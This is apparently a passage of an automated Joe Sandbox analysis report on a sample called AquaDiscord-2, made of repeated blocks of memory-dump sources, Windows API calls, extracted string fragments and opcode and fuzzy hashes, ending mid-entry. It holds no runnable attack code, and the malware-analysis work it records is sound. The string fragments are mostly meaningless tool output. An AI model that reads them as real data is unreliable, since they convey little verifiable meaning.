                                                                                          • Opcode Fuzzy Hash: f9a28699d6b31238ebf079d96b8938e21f7f7c9835c25847d26b9e48ded2a9f9
                                                                                          • Instruction Fuzzy Hash: 34C175B55193908BD3318F14C4A13EBBBF1EFD6304F09896DD8C94B291DB389946CB86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: @C$AE$HL$_A
                                                                                          • API String ID: 0-4030145219
                                                                                          • Opcode ID: 534efaf77f455908aff534492c1509aef461239d46665a5585177bf4a958e2c3
                                                                                          • Instruction ID: a80bbf8f79369a0e44c9644778e8ef5235acd6d4d06437ec876c1968ce67e6fb
                                                                                          • Opcode Fuzzy Hash: 534efaf77f455908aff534492c1509aef461239d46665a5585177bf4a958e2c3
                                                                                          • Instruction Fuzzy Hash: 7C814476A183009FE320CF15EC4179FB6E5FBC5308F04893DF69497291DBB895058B86
                                                                                          APIs
                                                                                          • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,00B0AB2D,?,00000000), ref: 00B0B210
                                                                                          • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,00B0AB2D,?,00000000), ref: 00B0B239
                                                                                          • GetACP.KERNEL32(?,?,00B0AB2D,?,00000000), ref: 00B0B24E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InfoLocale
                                                                                          • String ID: ACP$OCP
                                                                                          • API String ID: 2299586839-711371036
                                                                                          • Opcode ID: 22eda6c6ee036254d10580be806a32861953492d35312a3302aed881e8925f5c
                                                                                          • Instruction ID: 9be4740bbe89838a8ade5cc2507af315e2fa7421e09d81fe59ed583db882ed99
                                                                                          • Opcode Fuzzy Hash: 22eda6c6ee036254d10580be806a32861953492d35312a3302aed881e8925f5c
                                                                                          • Instruction Fuzzy Hash: 7221C532B10101A6DB348F65C941FABBFE7EF94B50B5684E4E91AE7294E732DE40C390
                                                                                          APIs
                                                                                            • Part of subcall function 00B0590A: GetLastError.KERNEL32(00000000,?,00B07C8D), ref: 00B0590E
                                                                                            • Part of subcall function 00B0590A: SetLastError.KERNEL32(00000000,?,?,00000028,00B01F53), ref: 00B059B0
                                                                                          • GetUserDefaultLCID.KERNEL32 ref: 00B0AAFF
                                                                                          • IsValidCodePage.KERNEL32(00000000), ref: 00B0AB3D
                                                                                          • IsValidLocale.KERNEL32(?,00000001), ref: 00B0AB50
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00B0AB98
                                                                                          • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 00B0ABB3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                          • String ID:
                                                                                          • API String ID: 415426439-0
                                                                                          • Opcode ID: 6e2935333555cd2a159e3d4bb38e4f638542d650fb76c167dda44b2cd3f73cc3
                                                                                          • Instruction ID: 83143d2b432a810b31b49e5e5705af76173b9d04d444f45ddadaa7b568b08b52
                                                                                          • Opcode Fuzzy Hash: 6e2935333555cd2a159e3d4bb38e4f638542d650fb76c167dda44b2cd3f73cc3
                                                                                          • Instruction Fuzzy Hash: E3514F71A00719ABDB20DFA4CC85AAE7BF9FF04700F5449A5E911EB1D0EB70DA40CB62
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 00423900
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,998682E1), ref: 004239C0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: _A$QS
                                                                                          • API String ID: 237503144-425339690
                                                                                          • Opcode ID: 4762ee07f7709c5bcd6f4bf0c8ec826581c1f83c059e326cb24f1ab0a6b071cb
                                                                                          • Instruction ID: ff13ee4a08f2bc40c02b98611d89e7d10dbb1fafe05ff50cca4a939355d2c245
                                                                                          • Opcode Fuzzy Hash: 4762ee07f7709c5bcd6f4bf0c8ec826581c1f83c059e326cb24f1ab0a6b071cb
                                                                                          • Instruction Fuzzy Hash: 50A1F0B66183109BE310CF25EC8171BBBE1FBC6318F048A3DF9949B391D7B599058B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 74$Bt$Kq$WD$D:
                                                                                          • API String ID: 0-3575891768
                                                                                          • Opcode ID: 8b69e38a951d46793538621483d2774adb47c41ab40b947929baeac8a2f04a7c
                                                                                          • Instruction ID: f5160d97b9eac11fab9500262d1b66c28d53c3fa8702a8ff15d64c5c26f1ec96
                                                                                          • Opcode Fuzzy Hash: 8b69e38a951d46793538621483d2774adb47c41ab40b947929baeac8a2f04a7c
                                                                                          • Instruction Fuzzy Hash: D8E14676A183218BD728CF25C85136BB7E2FFD5314F08892DD9C28B385E7789805CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -!A$/$1,$WQ%M$x~ly
                                                                                          • API String ID: 0-1076345736
                                                                                          • Opcode ID: df7137c20f6d98db71fd7f9cd5ab8673dccb301e0d52dc62b0ac4a7c1e4ba469
                                                                                          • Instruction ID: c81af30fa47a614f92e316ab3865125c2c0ebe1d49a083b5cf17de503e1f0e37
                                                                                          • Opcode Fuzzy Hash: df7137c20f6d98db71fd7f9cd5ab8673dccb301e0d52dc62b0ac4a7c1e4ba469
                                                                                          • Instruction Fuzzy Hash: BE512B7160C3E18BD3058B2A94A037BFFE19FE7701F68845EE5D15B382D67988058BA7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -!A$/$1,$WQ%M$x~ly
                                                                                          • API String ID: 0-1076345736
                                                                                          • Opcode ID: ef50efb5b4acaef2404ef908d4d049a33927374b76c53d0c1120b1c30fb30d09
                                                                                          • Instruction ID: 6becc890d84fb257d89dfee27970379ddd0fc9186fd5d0e68907015a65abed32
                                                                                          • Opcode Fuzzy Hash: ef50efb5b4acaef2404ef908d4d049a33927374b76c53d0c1120b1c30fb30d09
                                                                                          • Instruction Fuzzy Hash: ED512B70A0C3E18BD3158B2A94A037BFFD19FE7701F68845EE5D157381D67988058BA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction ID: 6087d36c37d27f03c201a8a8b1e2bab508dc7e2ce5e9f1ff9b03f7f92d281836
                                                                                          • Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
                                                                                          • Instruction Fuzzy Hash: A5023DB1E002199BDF14CFA9C9846AEFBF5FF48714F2482A9E515E7381D731AE418B90
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00AF9A3F
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 00AF9B0B
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00AF9B24
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 00AF9B2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909645953.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909632146.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909666742.0000000000B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909681954.0000000000B20000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909698006.0000000000B24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2909712695.0000000000B27000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_af0000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 68770f67e1a25991ae53548a248ada90603b5893a7adf4af25b4f61875610166
                                                                                          • Instruction ID: ac04cb186d8af9a04d519f059d8451eae93b52ede320bffc0c5f485912c4bca3
                                                                                          • Opcode Fuzzy Hash: 68770f67e1a25991ae53548a248ada90603b5893a7adf4af25b4f61875610166
                                                                                          • Instruction Fuzzy Hash: 77312875D0521C9BDF61EFA4D9897CDBBB8AF08300F1041AAE50CAB250EB719A848F45
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeLibrary
                                                                                          • String ID: _`$vm#b
                                                                                          • API String ID: 3664257935-1728712856
                                                                                          • Opcode ID: e53f08ddf99994442553c084195a65b1456403216c45deaff13bb5ab18a3460d
                                                                                          • Instruction ID: c3b53cb5a17e9d19d5249ff015162dbf28cf73674390ba62343818fa9bc44c10
                                                                                          • Opcode Fuzzy Hash: e53f08ddf99994442553c084195a65b1456403216c45deaff13bb5ab18a3460d
                                                                                          • Instruction Fuzzy Hash: 325114716483829FD3158F25D89176BBFE1AFD2310F18992DE1D68B281DB7888058B57
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$07Y$gfff
                                                                                          • API String ID: 0-3731902943
                                                                                          • Opcode ID: 9a038d0fdd0153f5bf756e2ced00d44fafd22744d4e1503639a27f9596a22375
                                                                                          • Instruction ID: 26db738034a22c520161b30420a9933d2acc67b269f448894966435822cf2757
                                                                                          • Opcode Fuzzy Hash: 9a038d0fdd0153f5bf756e2ced00d44fafd22744d4e1503639a27f9596a22375
                                                                                          • Instruction Fuzzy Hash: DAC14A3060A3418BC7258F28C4912A7BBF2EFD6320F18855EE5D18B391E33D9855C75B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 9$>0$x
                                                                                          • API String ID: 0-1232632554
                                                                                          • Opcode ID: 3e016b760f0ba3c9620baf6b90ad7076c84c82c3e05c1fa2d5428d8f1798b52d
                                                                                          • Instruction ID: a15ceac8e34a6d6ead5daf2351f5c682b3a1cfda95a6a2be99d7c9f15c15af21
                                                                                          • Opcode Fuzzy Hash: 3e016b760f0ba3c9620baf6b90ad7076c84c82c3e05c1fa2d5428d8f1798b52d
                                                                                          • Instruction Fuzzy Hash: 249123B5A043219BD7209F24DC82B67B3B0EFD5354F08852EF9899B391E778E801C75A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D$[_$fY
                                                                                          • API String ID: 0-733380153
                                                                                          • Opcode ID: 51856e5099c74df1fc07e65b7bda08bc62192bdcf520bf499ebd3990fdc9bd96
                                                                                          • Instruction ID: e600800951c0d246200edf198352cbf1854996a72d2edab27a39a4e0f7ee8b1f
                                                                                          • Opcode Fuzzy Hash: 51856e5099c74df1fc07e65b7bda08bc62192bdcf520bf499ebd3990fdc9bd96
                                                                                          • Instruction Fuzzy Hash: 4AA19BB1118340CBD3288F24C8A1BABBBF1FF86354F09595DE4865F3A1E7798845CB5A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D]+\$RAA
                                                                                          • API String ID: 0-2997780931
                                                                                          • Opcode ID: 34c27bd9d1288e6d173f317dd7ee89ea1b07e6df424be4839f1b6e0f8a31b356
                                                                                          • Instruction ID: 65781ec4038b74b51e0c428162170844e7c8db529c6f3fe48934e8f45840f545
                                                                                          • Opcode Fuzzy Hash: 34c27bd9d1288e6d173f317dd7ee89ea1b07e6df424be4839f1b6e0f8a31b356
                                                                                          • Instruction Fuzzy Hash: 0D527679608301DBD7189F19EC41BBB73E2EBC6315F05483EE88597282E7389D42C78A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 79$AY[g
                                                                                          • API String ID: 0-767607040
                                                                                          • Opcode ID: 75940066473ea754df7debfb61beb5f349bdf3c574ea88399dab23c11acdc1af
                                                                                          • Instruction ID: 2378d829f951076b51066a7ac086adcacedc0a2d49c7517852f85ee3cb7ca400
                                                                                          • Opcode Fuzzy Hash: 75940066473ea754df7debfb61beb5f349bdf3c574ea88399dab23c11acdc1af
                                                                                          • Instruction Fuzzy Hash: 188118616483819FD315CF2984907ABBFE1AFD7301F0889ADE4D58B382D23D890EC756
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HTJ@$NEzL
                                                                                          • API String ID: 0-778903024
                                                                                          • Opcode ID: cdb93f8508b33442bc4b86824c012b887ad7add5c49574bd6d2b58a9ae40dab9
                                                                                          • Instruction ID: f250adcc034ca2d69ec01274816afd61d580dd097cb6860af304507c585650cb
                                                                                          • Opcode Fuzzy Hash: cdb93f8508b33442bc4b86824c012b887ad7add5c49574bd6d2b58a9ae40dab9
                                                                                          • Instruction Fuzzy Hash: 4F41232460D7E18ADB328B3994A43F7BBE19F97314F9809ADC4CD9B343CB3904068796
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HTJ@$NEzL
                                                                                          • API String ID: 0-778903024
                                                                                          • Opcode ID: 806f3c58126dd206b782976f3eab4f1b5fd7efcc072ccba837e147ad8b25bb6e
                                                                                          • Instruction ID: 50480005730b2ed0de741354e1467de79a17c865a4212da3418e2b02d3e8f24a
                                                                                          • Opcode Fuzzy Hash: 806f3c58126dd206b782976f3eab4f1b5fd7efcc072ccba837e147ad8b25bb6e
                                                                                          • Instruction Fuzzy Hash: 9341072420D7E14ADF369B3990643F7BBE19F97314FA8459DC0D94B243CB384406CB96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HTJ@$NEzL
                                                                                          • API String ID: 0-778903024
                                                                                          • Opcode ID: 4b556cf63778863a4b21db29bc6b3fc65a6cbfa19378192689087ff3aa3b68fc
                                                                                          • Instruction ID: 279d10894c9e7d1f9220d9bc0612f94080851a018c3da9949d07ce01a39e61d1
                                                                                          • Opcode Fuzzy Hash: 4b556cf63778863a4b21db29bc6b3fc65a6cbfa19378192689087ff3aa3b68fc
                                                                                          • Instruction Fuzzy Hash: 0631A02410D7E18ADF319B39A0643FBBBE19BA7314F98499DC0DD5B243CB384406CB56
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID: f
                                                                                          • API String ID: 2994545307-1993550816
                                                                                          • Opcode ID: 9658deeb176dca335962a4b351641ebaa03433d52079c4468506c1511ecfcf50
                                                                                          • Instruction ID: 64db93ce7ce3cb20fbb1447096579fd07b34ecb83f1d1032b5a205255a4cfaa7
                                                                                          • Opcode Fuzzy Hash: 9658deeb176dca335962a4b351641ebaa03433d52079c4468506c1511ecfcf50
                                                                                          • Instruction Fuzzy Hash: 8C121A31A083518FD718CF2AC89076FB7E2EBC8314F29962DE49597391D738DC068B96
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: b>B
                                                                                          • API String ID: 0-1829109149
                                                                                          • Opcode ID: 239827f8904fd884b4320e46c1de81e70ed20015016c700879dc5f8ed3bec6c8
                                                                                          • Instruction ID: a1a1b0d006e0ca039f6644af3c7f2f6a4f5e3df4878b04ca0cc90ce6e8ae6dc8
                                                                                          • Opcode Fuzzy Hash: 239827f8904fd884b4320e46c1de81e70ed20015016c700879dc5f8ed3bec6c8
                                                                                          • Instruction Fuzzy Hash: BCE11432A083228BC714DF29D84066FB3F2FFD4701F59892DE8C597250E7389A46CB99
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Qh
                                                                                          • API String ID: 0-416604385
                                                                                          • Opcode ID: 013369e320ae7dca968d1f3d19f8e395fc4f02e944cc60745db3c7de7d1cbf27
                                                                                          • Instruction ID: 611c37984c01b3c8a3d4b54c24d13f9d27846cd2c0722835c88c2d00e8e561f0
                                                                                          • Opcode Fuzzy Hash: 013369e320ae7dca968d1f3d19f8e395fc4f02e944cc60745db3c7de7d1cbf27
                                                                                          • Instruction Fuzzy Hash: 8AC12675B083108BD724DF25E89267BB3E1EFA1354F58852EE8C297391E738E905C35A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "/(
                                                                                          • API String ID: 0-2843922497
                                                                                          • Opcode ID: 18b78cab4c7369e9d45cc31921eaa90a2d39cd5b09d68d10891896cc9532ca50
                                                                                          • Instruction ID: 138b045e5ea7b3503a6739a2735fe6408bc333a7e413c3dcd1e756a0dc5547fa
                                                                                          • Opcode Fuzzy Hash: 18b78cab4c7369e9d45cc31921eaa90a2d39cd5b09d68d10891896cc9532ca50
                                                                                          • Instruction Fuzzy Hash: 6AB147356883104BD714DF26C881B6BB7E2EBCA314F19A92EE4D157382D339DC16879B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2nA
                                                                                          • API String ID: 0-571203523
                                                                                          • Opcode ID: 497cfef724bb9ac7061a692183e1d4e83dded868f9ea9c9f698713437ff4e0b1
                                                                                          • Instruction ID: 77fdca5c366ee5fb7d436d44c078de1679970444f4c0ea169dc3108eb42a7168
                                                                                          • Opcode Fuzzy Hash: 497cfef724bb9ac7061a692183e1d4e83dded868f9ea9c9f698713437ff4e0b1
                                                                                          • Instruction Fuzzy Hash: C8D12535A08351DBD724CF25D8917ABB7E2FB8A304F05882DE4C997391D738D846CB8A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 0c1408164ed7949986994ce03b00d7f9f6ff7a1cfba4423f7ffe27ec7dc4ff91
                                                                                          • Instruction ID: 377722463409a4d12b2c163946e6c12f40929f760cfd9cb0d738a70ec78ffdec
                                                                                          • Opcode Fuzzy Hash: 0c1408164ed7949986994ce03b00d7f9f6ff7a1cfba4423f7ffe27ec7dc4ff91
                                                                                          • Instruction Fuzzy Hash: A7C113B1B043215BD7118E24E450B6BB7E6AF84354F99892EE89587381E738EC15C7CB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "
                                                                                          • API String ID: 0-123907689
                                                                                          • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                          • Instruction ID: 457bcc4734e36970056bd64e4885e605d8806025b2c38a961ce7be2c02d729d8
